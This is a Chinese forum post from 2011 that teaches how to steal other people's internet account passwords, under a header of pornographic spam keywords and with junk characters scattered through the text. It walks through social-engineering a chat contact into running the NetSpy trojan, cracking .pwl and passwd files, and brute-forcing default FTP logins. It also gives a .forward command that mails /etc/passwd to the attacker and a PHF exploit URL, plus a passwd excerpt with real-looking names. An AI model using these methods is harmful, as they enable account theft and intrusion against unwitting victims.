久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      • <sub id="9pxky"></sub>
    2. 

      <small id="9pxky"></small>
        

          

          汶上信息港
          
標題: 如何得到別人的上網(wǎng)帳號和密碼 [打印本頁]
          

          
作者: 雜七雜八    時間: 2011-1-12 21:03
          
標題: 如何得到別人的上網(wǎng)帳號和密碼
          如何得到別人的上網(wǎng)帳號和密碼,我在這里介紹幾種弱智方法。" K. P* ?" j+ w/ M1 y1 L
          
方案一:利用特洛伊木馬得到帳號。必備工具:NTESPY、PWLVIEW。
          
% ~* e, I+ w" @優(yōu)點:只要對方運行了程序就有80%的成功率,而且不需要任何網(wǎng)絡(luò)入侵知識,只要能熟悉的操作上面兩個軟件即可。NETSPY是全中文軟件,一看就會。而PWLVIEW又是弱智操作只要在DOS下輸入PWLVIEW然后按回車即可。成功率高,操作簡單而且用不了多長時間是它最大的優(yōu)點,只是......7 {0 n+ F: n+ ]- t
          
缺點:只有一個,那就是如何讓對方乖乖的運行你的程序。
          
/ Z* F9 {9 P# K4 F7 j提示:先問清你的目標和你是不是在一個城市。3 Y9 Q7 d% h0 G- B* d6 v
          
實戰(zhàn)演戲:一天,我在X海聊天室里尋找目標,遇見了同在北京的色鵝丟丟。我上前打招呼:丟丟好呀。丟丟說:你好呀。我又說:XXXXXXX(客套話,先和他拉關(guān)系)對了,我拿到了一個新程序,要不要看看?丟丟說:好呀,寄給我吧。
          
  p  p. R) C1 Z( q% W1 i哈哈,魚上鉤了!先把誘餌程序改個名,如改成readme之類的東東,然后和一些不相干的東西發(fā)過去,然后你讓他先運行README。在這插一句,有一位大俠使用此法時,竟然把控制端程序和NETSPY的說明文件一起發(fā)了過去,真搞不懂他怎么想的。我對他說,你先運行README,是中文說明。丟丟說:好...咦,怎么沒反映呀?(YEAH!)我又說:那你直接運行軟件吧。丟丟說:好吧...不錯...我說:明天見...開始干活,連上他的機子后,現(xiàn)在C盤里找到了WIN95的目錄WINDOWS。也有可能是WIN95或WIN98,進入后查找*.pwl,然后把所有后綴名為PWL的文件都抓過來,放在你的工具PWLVIEW的子目錄里。在DOS窗口下輸入PWLVIEW然后敲回車,丟丟的上網(wǎng)帳號和密碼就都顯示出來了。而且以后如果他上網(wǎng),NETSPY就會通知你,他就再也逃不出你的手掌心了。就算是他換了密碼,你也能在2分鐘內(nèi)再把他搞定。
          
6 S, t& N6 ^, z3 u/ C9 V忠告:你用他的帳號上網(wǎng)后第一件事就是先去查看他的上網(wǎng)時間。分析一下他一般幾點上網(wǎng)以避免撞車。
          
' n  f5 ?4 D; l$ \, p0 C' m方案二:利用ISP的疏忽做文章舉。例用工具:EMAILCRK或網(wǎng)絡(luò)刺客/ q* k  d: x& A/ j& ~6 R
          
優(yōu)點:沒什么優(yōu)點
          
5 F+ a$ a* B1 u& t$ U* f缺點:要具體情況具體對待,太麻煩% V2 e9 l$ h- d8 K
          
提示:平時多多留神。
          
! V+ Z" r, O8 Q7 t$ s) M' B5 H譬如,某個ISP給你開好了帳號,然后又畫蛇添足的給你一個郵箱,地址是:你的帳號@xxx.net
          
4 `6 d0 c: w- U密碼和你的上網(wǎng)密碼一樣。也就是說,只要你能敲開郵箱的密碼就一切OK了。
          
+ ?! u2 V% K5 a$ _1 J+ M運行EMAILCRK或網(wǎng)絡(luò)刺客,套上字典后就等著。一般沒有XX個小時搞不定,不成功的可能性很大,而且破解時還必須要上網(wǎng)。你的機子要是快可以開上三四個窗口,套上不同的字典一起破
          
& e3 C! A% a. u# V7 A/ I9 i方案三:侵入郵局主機然后把PASS檔抓回來,然后用JOHN或JACK套上字典開始破。) t* }7 n; G! T5 H$ i
          
優(yōu)點:一次可以破出好多帳號,而且如果運氣好還能拿到ROOT,這個主機就要歸你控制了。而且破解時不用上網(wǎng),可以好幾臺機子一起破。' X0 v6 j; b1 _: T" E  j6 q
          
缺點:對于初學者有一定困難,尤其是只想拿一個上網(wǎng)帳號這樣做恐怕會得不償失。而且被發(fā)現(xiàn)的可能性很大,情節(jié)嚴重且性質(zhì)惡劣,一定要慎重對待。2 |: t- p! x6 q9 }
          
由于介紹此類的教學文章比較多,我就不班門弄斧了。 
          
& x7 W9 W5 y6 Y' h1 N" E# H. l7 d+ `$ M( o/ ~- d5 A: L+ ^7 p
          
哈哈,我來說說最簡單的入侵方法。其實入侵大體的原理相同,主要是利用系統(tǒng)的漏洞(BUG)來做文章。
          
0 K# T5 O$ M% ~: \1 y只不過有的網(wǎng)站漏洞難找有的好找而已。一個好的黑客,就是要能很快的發(fā)現(xiàn)漏洞并加以利用。下面我給大家舉一個小栗子。
          
( q; e* q# Z8 T" @+ I+ e- m2 B有一天,我去XX熱線申請主頁,發(fā)現(xiàn)那里采用的是機器自動回信,信的大概格式如下:
          
( Q% W# `' W* W( O; K
          
( }. F; u' J* B  b' r------------------------------
          
3 {7 C& G' [, X) ~" V& p. \- d
          
8 i8 V, @- W. e$ m- }7 d- U, zXXX,你好(XX是你在表格上填的名字)
          
6 `& w5 ^! f- l& F' o/ H; \你在XX熱線的主頁空間已開通
          
. s8 K0 E0 {: I/ y# a7 z- K2 c帳戶名:XXX 密碼:11" S9 Y' ]6 k5 V' {! v. f# U0 l
          
-----------XX熱線
          
4 {  f% `% n: f2 M, R; }8 S電話:XXXX-XXXXXXXX
          
1 p$ C. V- |) I# u------------------------------
          
! c# J% S1 r4 z; Y0 ?3 w* g; P& {' n" J& g% l9 g
          
好了,由于是機器回信,所以那里所有人的初始密碼都是11,而且該熱線要更改密碼要TELNET到郵局主機去改,有許多網(wǎng)友并沒有接觸過如何T主機,所以他們使用的還是初始密碼11。
          
1 C0 T( J& ]/ G4 _) p8 G$ H$ W開始干活了,打開FTP軟件,輸入XX熱線的IP,密碼11,然后挨個輸入帳戶名。帳戶名可去XX熱線的主頁空間列表里查看,先試試AAAA,。。。沒成功,再換一個,AABB。。。還是不行。哈哈,這個用戶名短,沒準能行。輸入AA。。。進去了。寄下用戶名然后繼續(xù)試,ABC。。。又成功了,看來沒改密碼的人很多呀。試幾個就行了,現(xiàn)在,你已經(jīng)擁有這些帳戶的控制權(quán)了。6 t- M# T$ M. L! R- y$ ^/ i3 W5 V
          
上面的這個栗子很簡單,一般象這么大的漏很難找。要侵入一個稍微象點話的站臺就要耗費你大量的時間和金錢,而且還未必能成功。即使成功了,你不改它實在無趣,改了恐怕會步馬X的后塵。此人侵入貴陽的主機并把界面換成了一張淫穢圖片。害的自己吃飯不用花錢了。所以我在這里勸大家一句,把這方面的精力放到全心全意為人民服務(wù)上去。實在不行就去聊天室,看誰不聽話就炸他,同樣很過癮的!+ y' M$ k( h" g; K
          
  , l# p" z  N1 P+ v9 @1 ]  r
          

          
1 R0 t6 g  @, e8 F5 t                           如何獲得第一個帳號
          
1 k- t- {. Z$ L8 ?- l0 K) g* W) H5 q% y3 K* b0 W, u
          
我們這種水平不高的黑客入侵都是先得到系統(tǒng)的一個有效帳號,進入后再利用系統(tǒng)BUG得到ROOT權(quán)限或想辦法得到SHADOW再解密.無論是利用系統(tǒng)漏洞還是得到SHADOW都是有一定規(guī)律可尋的,通常你到一些黑客站點找到對應(yīng)系統(tǒng)相應(yīng)版本的EXPLOIT編譯后執(zhí)行就行了.我感覺最困難的是獲得第一個有效的帳號,有時侯費盡力氣也得不到,后來總算是積累了一些經(jīng)驗,想寫出來和大家交流一下,希望能拋磚引玉,請高手們把更好的方法告訴我." h, s2 o$ Q, v: {- \7 P; i
          

          
5 i% U) K" y' X! @; I  l確定了目標以后,我通常是先用匿名FTP去看一下,許多網(wǎng)站都開匿名FTP,帳號用ANONYMOUS或是FTP,密碼用一個EMAIL帳號(當然是假的),進入后到/etc目錄下把PASSWD拿回來,一般情況下都是一份很不全的名單,只有幾個系統(tǒng)帳號,那就算白來了:-}但有的時候會有比較傻的管理員把一些普通帳號放進去,這就是很重要的信息,雖然只有帳號沒有密碼,但畢竟邁出了第一步.如果FTP主目錄是drwxr-xr-x,做一個.foward文件傳上去,在UNIX下的命令應(yīng)該是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后給匿名用戶寫一封信,它會把PASSWD發(fā)給你。* n" v( H" R( h' Q" p; E7 h
          

          
) r0 F6 `- I1 B$ f如果目標沒有匿名FTP,就通過WWW訪問它的主頁,看看上面有什么信息,例如通過一些聯(lián)系人的EMAIL你就可以發(fā)現(xiàn)一些帳號,有的網(wǎng)頁上甚至列出了EMAIL通訊錄,這對黑客來講就是無價之寶.把這些帳號記下來,非常有用.2 @; J5 X; ~) y+ \
          
7 d- p5 s. b" f; e) U" J7 ]6 h
          
以上幾個方法都不行的話,那就試試PHF查詢.在瀏覽器的地址欄輸入http://攻擊目標/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的話會顯示出PASSWD來,但是成功率極低:-< 0 g3 q0 F& _" r! d, g! L  @+ M
          

          
& i; n' l) a% k- p還可以利用目標的FINGER功能來積累帳號,如利用HAKTEK(一種掃描器)來監(jiān)視目標,一旦有人登陸該主機就會報告給你.但這種方法的缺點就是浪費時間,如果你是自己花錢上網(wǎng)的話可就要出血了!" A3 e" f9 b% _6 B7 L2 M
          

          
" Y2 Q8 _; x2 [很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系統(tǒng)默認的帳號,例如:
          
8 G  E* p6 r6 A, d+ @# V2 o4 h; y, J4 Z
          
帳號     密碼
          
; r$ Y& [; |5 c1 T8 Y: c% s----------- ----------------# N+ [' h' ?  F" _  L
          
root    root5 ~" q3 |2 {& X1 Q
          
sys     sys/system/bin
          
5 q) b; v% i4 u$ h, n5 U, F. \( t5 Xbin     sys/bin" |1 w! L( ^" d0 x% u
          
mountfsys  mountfsys$ Y4 o7 M- `. S7 v8 N' X2 T: n& O
          
adm     adm4 j6 \% ^0 }5 J( g
          
uucp    uucp
          
$ V) u- ?% |# q1 N( l( ^6 |nuucp    anon
          
5 a" c' q3 A$ l+ q0 z6 aanon    anon( Z& ^9 l* [6 Y# u# a! N( R
          
user    user
          
9 q- `# ?* _; k! H! t+ [7 Vgames    games
          
9 E; Y0 g! }. ~  N3 G1 x7 Iinstall   install) z6 q) E& d% S
          
reboot   給 "command login" 用的
          
* s! P3 [5 k. L6 Jdemo    demo
          
  `2 |# }1 O/ c5 }& sumountfsys umountfsys  s7 ?  Y( O) [7 b2 l3 \- U% k
          
sync     sync
          
- |# H& D! Q& R* o# l! vadmin    admin
          
. i( W8 E, U* ]" m1 s; kguest    guest( F% n7 K& b. s& J# [! G
          
daemon   daemon5 b/ z# i" m( e5 \0 B1 T
          
________________________________________________________________! b; i) w' I3 H
          
3 w6 k# `" b" s8 O* F
          
有些管理員忘記把他們改掉,那你就發(fā)財了!6 o2 r% [+ c( Q2 \6 j- z# C
          
9 h" [& {) o- r. E
          
另外還有一些習慣性帳號如:test,www,html,web,oracle,setup,sybase,john,tom等也都應(yīng)該試一試.
          
/ l. F8 H/ s' O. K) p6 Z
          
) s  W5 _& S- a1 Q* d0 ?只有帳號還不能進入系統(tǒng),但有了帳號搞密碼就容易一些了,主要辦法還是猜.如果是通過PASSWD知道帳號的那你應(yīng)該會發(fā)現(xiàn)該用戶的許多信息,例如:' _+ s  p! t+ T; ^
          
: O$ S) K" P! ^8 J* k' K1 H
          
.........# r: I: w% U3 P/ g1 a  F" G
          
3 `1 ~+ d: ^& R7 ?) ^, ~: a
          
xlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
          
9 }: _* a7 i! ^7 P0 w0 ]- U/ _( r* F3 g+ {, ^
          
qingyuan:x:275:50::/usr/qingyuan:/bin/sh
          
0 X8 [- n1 d4 ~8 j5 F
          
$ Z7 K- f1 L  Q* @/ N/ K( J0 q; h' W3 Fhjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
          
; ~2 `) i) n% |; |
          
6 d& N" B2 |+ l% L1 S  n( ]' jsmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
          
8 ]/ s! b! B" j1 c9 f, h. i! d* c
          
' |% `& e3 W! V& g/ O9 Tkyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh
          
$ ^# s: z" N' s5 I3 e. O" X2 A1 t% _7 H' q2 V1 Z
          
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh( s, g5 C  z4 z- s1 R# R) h4 `
          

          
1 \' Q" ]2 g. [tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh+ k# X8 t0 f/ I2 q; Y, K- E
          

          
9 T% Y0 ?# x+ T; ]............9 h9 N  m% h$ J+ Y8 @. U& l
          

          
$ l8 c4 j5 R+ E' [% ?* O& l, q這是一部分PASSWD,從這兒我們可以得到七個帳號,注意每一行的第五項,那是該用戶的真實姓名,對!就用它來做密碼試.成功率還是比較高的.
          
  g9 n1 s$ {6 y. K9 n* ^
          
8 F+ t4 x- q! n/ _如果是用其他方法獲得帳號的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個帳號support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項來偵察support@xxx.xxx.xxx會獲得很多該帳號的信息例如真名實姓,電話號碼等就用這些做密碼來猜">如果是用其他方法獲得帳號的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個帳號support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項來偵察support@xxx.xxx.xxx會獲得很多該帳號的信息例如真名實姓,電話號碼等就用這些做密碼來猜.
          
, A; I7 V9 m9 k) b' ]
          
2 }: F! ^- r/ L0 b% g當然最可能的密碼還是帳號本身和一些帳號的變形,如帳號是john,密碼可能是nhoj,john123,john888等.或是一些簡單數(shù)字.總之是要費一番工夫來猜的." H; Y$ W2 U  I1 B
          

          
! L3 F. q0 c. q$ V8 B如果還猜不出密碼,只好用LETMEIN之類的東西來猜,字典一定要好.否則,你的電話費就要.....而且這種方法比較危險,還是不用為好.9 ?/ x- s, e* \! T. I
          

          
' Q9 K: E5 d8 b* h最后實在不行還有一種比較卑劣的手段,就是給該網(wǎng)站的網(wǎng)管寫封信,想辦法騙他執(zhí)行特洛伊木馬,然后再.......算了,不說了.  h5 \3 g3 `# \, z* x, {
          
9 b- V; L9 F* P! C% O* x  Z
          
你可能發(fā)現(xiàn)以上這些方法都不能百分之百的成功,或者說成功率是比較低的,因為我也不知道更好的方法.但我感到一定有一種更好的方法,希望有高手見到此文能告訴我.
          
' X) l6 j) u% m6 T8 B2 a, n4 ]) |& P: [; G1 M! W3 C6 N) w5 l
          





          

          

          歡迎光臨 汶上信息港 (http://www.junkejituan.com/)

Powered by Discuz! X3.5